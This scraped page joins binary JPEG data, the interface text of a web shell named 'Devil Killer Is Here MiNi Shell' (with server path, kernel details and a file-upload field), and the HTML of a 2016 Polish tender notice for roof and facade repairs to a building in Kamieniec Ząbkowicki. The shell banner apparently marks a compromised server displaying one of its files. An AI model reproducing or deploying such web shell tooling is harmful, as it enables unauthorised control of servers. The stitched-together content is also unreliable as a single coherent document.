JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160704/118039-N-2016.html

<p class="kh_header"><b>Kamieniec Ząbkowicki: Remont dachu i elewacji budynku mieszkalnego wielorodzinnego, 
Adres: ul. Wąska 5,5A,5B, 57-230 Kamieniec Ząbkowicki</b><br>
<b>Numer ogłoszenia: 118039 - 2016; data zamieszczenia: 04.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Złotostocka 4, 57-230 Kamieniec Ząbkowicki, woj. dolnośląskie, tel. 74 8173218, faks 74 8173218.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowy Zakład Budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu i elewacji budynku mieszkalnego wielorodzinnego, 
Adres: ul. Wąska 5,5A,5B, 57-230 Kamieniec Ząbkowicki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS  ZADANIA.

Opis i ogólny zakres robót podstawowych  zadania.
W ramach przedmiotowego zamówienia, przewiduje się wykonanie robót budowlano - remontowych i modernizacyjnych w budynku mieszkalnym wielorodzinnym w Kamieńcu Ząbkowickim przy ul. Wąskiej 5, 5A i 5B w zakresie:

Zakres ogólny robót podstawowych obejmuje:
Remont elewacji wg załączonego projektu budowlanego i przedmiaru robót - element B zadania
remont dachu - element A zadania

SZCZEGÓŁOWY ZAKRES ROBÓT PODSTAWOWYCH OBEJMUJE:
ELEWACJA:
Skucie wszystkich tynków elewacji wraz  cokołem wraz z obróbkami blacharskimi gzymsów, pasów elewacyjnych ogniomurów i attyk, podokienników i gzymsów nadokiennych  i innych elementów zamocowanych w ścianach elewacyjnych
wyburzenie pozostałości pilastrów po ścianach murowanych z wyrównanie ścian zew., wzmocnienie pęknięć liniowych ścian zewnętrznych poprzez wykucie bruzd  w spoinach cegieł co 3-4 warstwę prostopadle do linii  pęknięcia i obsadzenie prętów żebrowanych ze stali 34GS w spoinach cegieł dł. od 1,2 do 1,5 na zaprawie scalającej np. Cerinol ES lub CX 15 w wpełnieniem i zaprawieniem spoin,
wykonanie uzupełnienie szczelin pęknięć zaczynem cementowym lub zaprawą scalającą j.w., Oczyszczenie, zmycie ciśnieniowe i przygotowanie podłoża zgodnie z projektem budowlanym zaprawą scalająca j.w., miejscowe naprawy i wyrównanie  podłoża cegieł, uzupełnienie powierzchni ścian w miejscach szczelin i nierówności, tynkiem podkładowym np. STO POROGRUNDPUTZ (zużycie 20kg/m2 przy grubości ok. 2 cm), W miejscach widocznych pęknięć i wgłębnych ubytków podłoża, w warstwę tynku wkleić siatkę zbrojeniową o gramaturze 175 - 200 g na m2 np. STO GLASFASERGEWEBE, zagruntowanie podłoży preparatem gruntującym penetrująco - scalającym do podłoży wysoko - chłonnych np. PRIM GRUNDEX (zużycie 0,25l/m2),
wykonanie tynku i malowanie elewacji zgodnie  w kolorystyce zgodnej z projektem budowlanym  z odtworzeniem i zachowanie wszystkich ozdobnych elementów architektonicznych w tym między innymi boni elewacyjnych, attyk, obramień  okiennych i drzwiowych, ościeży, gzymsów nadokiennych, gzymsów  i pasów elewacyjnych, gzymsów okapowych z elementami fryzów okapowych i inne wg projektu elewacji, tynki zewnętrzne wykonać zgodnie z reżimem technologicznym i materiałowym jako, trzywarstwowe, kategorii III, gr. 2-2,5 cm z gotowej - zalecane - lub produkowanej na terenie robót zaprawy wapienno - cementowej - zwiększona ilość wapna -, przeznaczonej do stosowania na obiektach zabytkowych np. Atlas Złoty Wiek TWC, tynki zewnętrzne winny spełniać wymagania normy PN-70/B100, tynki zagruntować pod malowanie preparatem gruntującym np. STOPLEX W , a następnie dwukrotne pomalowanie krzemianową farbą elewacyjną STO lub Caparol w ustalonej kolorystyce. W ramach remontu elewacji wykonać wyprofilowanie powierzchniowe terenu przy budynku i opaski żwirowe z obrzeżami betonowymi 20x6 cm, szer. 0,5 m : warstwy opaski 10 cm podsypka piaskowa 10 cm, żwir płukany otoczkowych frakcji pow. 12 mm gr. 10-15 cm. 
obróbki blacharskie gzymsów okapowych i elewacyjnych oraz nadokiennych z blachy ocynkowanej gr. 0,55 mm,  izolacja roztworem bitumicznym np. Dysperbit i pojedynczą warstwą papy asfaltowej izolacyjnej pod nowe obróbki gzymsów okapowych podrynnowych, wymienić i uzupełnić podokienniki zewnętrzne  na podokienniki z blachy ocynkowanej, wykonać obróbki blacharskie z blachy ocynkowanej gr. 0,55 m attyk i ogniomurów ponad dachem.
DACH
Budynek 5-5A - pokrycie papowe:
Rozebranie istniejącego pokrycia z papy asfaltowej na lepiku, przyjęto 6 warstw papy, i dachówkowego na ogniomurach i attykach, Rozebranie wszystkich obróbek blacharskich oraz rynien i rur spustowych, wyrównanie ogniomurów poprzez wykonanie rolek z cegieł i uzupełnienie murów z cegieł oraz wykonanie gładzi cementowej na rolkach z cegieł ogniomurów i attyk wraz z izolacją roztworem bitumicznym np. Dysperbit i pojedynczą warstwą papy asfaltowej izolacyjnej pod nowe obróbki ogniomurów i attyk, Wykonanie nowych obróbek blacharskich z blachy stalowej ocynkowanej gr. 0,55 -0,60 mm: pasy nadrynnowe, obróbki ogniomurów i attyk, opierzenia ścian  ogniomurów i attyk oraz kominów, obróbki gzymsów okapowych i inne wg potrzeb i ustaleń w toku robót,
wymiana istniejącego wyłazu dachowego na typowy szt. 1, wykonanie wyłazu dachowego szt.1 Wykonanie rynien i rur spustowych z blachy stalowej ocynkowanej gr. 0,55-0,60  mm, rynny fi min. 150 mm, rury spustowe fi min. 120 mm, rozstaw haków rynnowych co 50 - 60 cm,  rozstaw haków rur spustowych maksymalny co 250 cm, wykonać noski na rurach spustowych, zabezpieczające przed zsuwaniem samoistnym, wszystkie połączenia rynien dachowych i rur spustowych lutowane obwodowo. Malowanie dwukrotne wszystkich obróbek blacharskich oraz rynien dachowych i rur spustowych farba poliwinylową np. Lowicyn lub równoważną z zachowaniem  wymaganej w projekcie kolorystyki ciemny brąz. Przygotowanie istniejącego podłoża z z desek poprzez wyrównanie, miejscową wymianę i miejscowe naprawy z wyprofilowaniem spadków, wzmocnienie  osłabionych krokwi i elementów więźby dachowej, wymiana miejscowa elementów więźby dachowej, całkowicie zbutwiałych i zniszczonych
pokrycie dachu papą termozgrzewalną dwuwarstwowe, papa asfaltowa modyfikowana SBS na osnowie z włókniny poliestrowej typ: papa podkładowa PF PYE PV 200 S40 i nawierzchniowa WF PYE PV 250 S52 lub równoważna na podłożu drewnianym z wykonaniem pasów dylatacyjnych z blachy ocynkowanej na pełnej szerokości połaci ( prostopadle do okapów) co 6-7 m, papa podkładowa zgrzewana na połączeniach i dodatkowo przybita do podłoża drewnianego gwoździami papowymi w rozstawie nie większym niż 15-20 cm. Pod styki papy podkładowej wykonać podkład na podłożu z desek - na sucho - ze specjalnej papy osłaniającej przed zaprószeniem ognia. Obróbki z papy nawierzchniowej na listwach trójkątnych styropianowych laminowanych papą z mocowaniem listwami dociskowymi z blachy ocynkowanej i uszczelnieniem silikonem dachowym - styki połaci dachowych z ogniomurami i  attykami oraz kominami, wysokość obróbek z papy nie mniejsza niż 17-20 cm, ogniomury w części środkowej dachu do pełnej wysokości - zalecane, przy połączeniach rynien z rurami spustowymi wykonać zbiorniczki .
Transport i utylizacja papy po dokonaniu rozbiórki  - wymagane dostarczenie dokumentu potwierdzającego wykonanie utylizacji papy
Budynek 5-5A - pokrycie dachówkowe:
Wykonać wymianę pokrycia dachu z dachówki karpiówki DK 15j na dachówkę ceramiczną DK18 w kolorze ceglastym, angobowaną, mocowaną wkrętami nierdzewnymi do dachówek i spinkami  nierdzewnymi  do łat drewnianych ( co trzecia mocowana w płaszczyznach środkowych, przy krawędziach i kalenicach dachowych należy  mocować każdą dachówkę do 0,5-0,6 m - krawędzie i dwóch trzech rządów okapy i kalenice). Dachówka ułożona na łatach drewnianych impregnowanych  o przekroju 40 x 60 mm. Maksymalny rozstaw łat 29-30 cm. Wymienić łaty drewniane. Membrana dachowa trójwarstwowa o masie jednostkowej nie mniejszej niż 170 g na 1m2 np. Eurovent Super lub równoważna, ułożona na krokwiach i przymocowana typowymi kontrałatami o wym. 40-50x20-25 mm. Płaszczyzny połaci dachowej wyrównać poprzez przybicie i przykręcenie do boków krokwi desek grubości 45 mm. Rozstaw gwoździ i śrub  mijankowo nie większy niż 40 cm. Na krawędziach kalenicowych  zamontować gąsiory kalenicowe pośrednie i początkowe. Na krawędziach szczytowych zastosować dachówki krawędziowe. Wykonać wyłaz dachowy. Styki połaci dachowych z murami uszczelnić zaprawą murarską i zamurować cegłą pełną w obszarze gzymsów od strony poddasza. Zamontować płotki śniegowe wzdłuż okapu od elewacji północnej i na naczółkach. Zamontować typowe okienka wyłazowe szt. 3 i ławy kominiarskie metalowe, szt.  3. Wymienić całość obróbek blacharskich: pasy nadrynnowe i opierzenia kominów. Przy połączeniach rynien z rurami spustowymi wykonać zbiorniczki . Rozstaw haków rynnowych i rur spustowych jak w część 5A i 5B.
KOMINY
Przemurować kominy ponad dachem i do 50 cm pod dachem z cegły klinkierowej pełnej, licowanej kl. 35 wg  PN-EN 771-1 oznaczenie HD na zaprawie cementowo - wapiennej m 7. Wymienić tynki na kominach na poddaszu kat. II z wtopieniem siatki wzmacniającej. Wykonać malowanie tynków kominów na poddaszu farbami elewacyjnymi silikonowymi. Czapki kominowe czterowarstwowe z -wyskokami- z cegły klinkierowej. Wymienić i uzupełnić wyczystki kominowe. Dopuszcza się zastosowanie cegły klinkierowej drążonej o powierzchni otworów nie przekraczającej 10% powierzchni cegły.
INSTALACJA PIORUNOCHRONNA
wykonanie nowych zwodów poziomych i pionowych  instalacji odgromowej z drutu do ogromów ocynkowanego fi 8 mm wraz z nowymi wspornikami dachowymi klejonymi do podłoża papowego i mocowanymi do podłoża dachówkowego, złączami rynnowymi i kontrolnymi oraz  łącznikami odgromowymi, łączna długość przewodów: zwody poziome ok. 250 m, zwody pionowe ok. 130 m, wykonanie typowych osłon przewodów uziemiających do wys. 2 m, alternatywnie, dopuszcza się wykonanie naciągów instalacji odgromowej, pomiary kompletne instalacji odgromowej - wymagane opracowanie i dostarczenie:  schematu i  metryki instalacji odgromowej,  protokołu pomiarów elektrycznych instalacji odgromowej, potwierdzonej kopii uprawnień osoby dokonującej pomiarów, 
uziemienie w podłożu typowymi szpilkami  wbijanymi w ilości ok. 40 szt., dł. ok. 1,5 m oraz w razie konieczności bednarką ocynkowaną, instalację piorunochronną należy wycenić w elemencie A - remont dachu, zadania jako dodatkową pozycję.
STOLARAKA BUDOWLANA:
wykonanie robót renowacyjnych drzwi zewnętrznych: oczyszczenie, naprawy stolarskie i konserwacja elementów drewnianych.
ROBOTY TRANSPORTOWE, RUSZTOWANIA
Ustawienie i rozbiórka rusztowań zew. pow. 8  m wysokości,
Załadunek, transport i rozładunek gruzu i odpadów po wykonywanych robotach wraz ze wszystkimi kosztami i opłatami wysypiskowymi.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.26.12.00-6, 45.45.50.00-1, 45.41.00.00-4, 45.43.00.00-6, 45.45.30.00-7, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 15 000,00 zł (słownie: piętnaście tysięcy złotych). Wadium winno zostać wniesione przed upływem terminu składania oferty. Pozostałe dane dotyczące wadium  wg SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1, dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, sytuacji ekonomicznej i finansowej.Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że go spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 2 (dwoma) robotami budowlanymi dla każdego elementu robót A - dach i B- elewacja  w tym:
remoncie lub wykonaniu dachów o pokryciach papowych i dachówkowych,  co najmniej jedna o wartości minimum 100.000,- zł. brutto, remoncie lub wykonaniu elewacji z tynków, co najmniej jedna o wartości minimum 200.000,- zł. brutto lub 1, odpowiadających technologią i zakresem robót niniejszemu przedmiotowi zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone, tj. dysponowanie kierownikiem budowy ( robót), posiadającym odpowiednie uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej, będącym członkiem izby samorządu zawodowego, posiadającym udokumentowaną co najmniej 2-letnią praktykę zawodową na budowie oraz posiadającym doświadczenie w pełnieniu obowiązków kierownika budowy w zakresie objętym przedmiotem zamówienia. Wymagane jest przedłożenie dokumentu potwierdzającego pełnienie funkcji kierownika budowy (robót) dla co najmniej jednego tego typu zadania, na wartość nie mniejszą jak: element A - dach: 100 000,- zł. brutto, element B- elewacja: 200 000,-zł brutto.
Warunek zostanie uznany za spełniony, jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w tym odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia, niezbędnych dla wykonania zamówienia, a także przydzielonego im zakresu czynności wraz z informacją o podstawie do dysponowania tymi osobami, zgodnie z Załącznikiem Nr 10 do SIWZ oraz złoży oświadczenie o kwalifikacjach kadr zgodnie z Załącznikiem Nr 11 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert na kwotę minimum 300 000,00 zł (słownie: trzysta tysięcy złotych), opłaconą polisę , a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 300 000,00 zł (słownie: trzysta tysięcy złotych)- do oferty należy dołączyć potwierdzenie wpłaty lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca ubiegający się o zamówienie powinien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 2 (dwoma) robotami budowlanymi dla każdego elementu robót A - dach i B - elewacja  w tym:
remoncie lub wykonaniu dachów o pokryciach papowych i dachówkowych,  co najmniej jedna o wartości minimum 100.000,- zł. brutto, remoncie lub wykonaniu elewacji z tynków, co najmniej jedna o wartości minimum 200.000,- zł. brutto lub 1, odpowiadających technologią i zakresem robót niniejszemu przedmiotowi zamówienia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Okres gwarancji - 0.1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
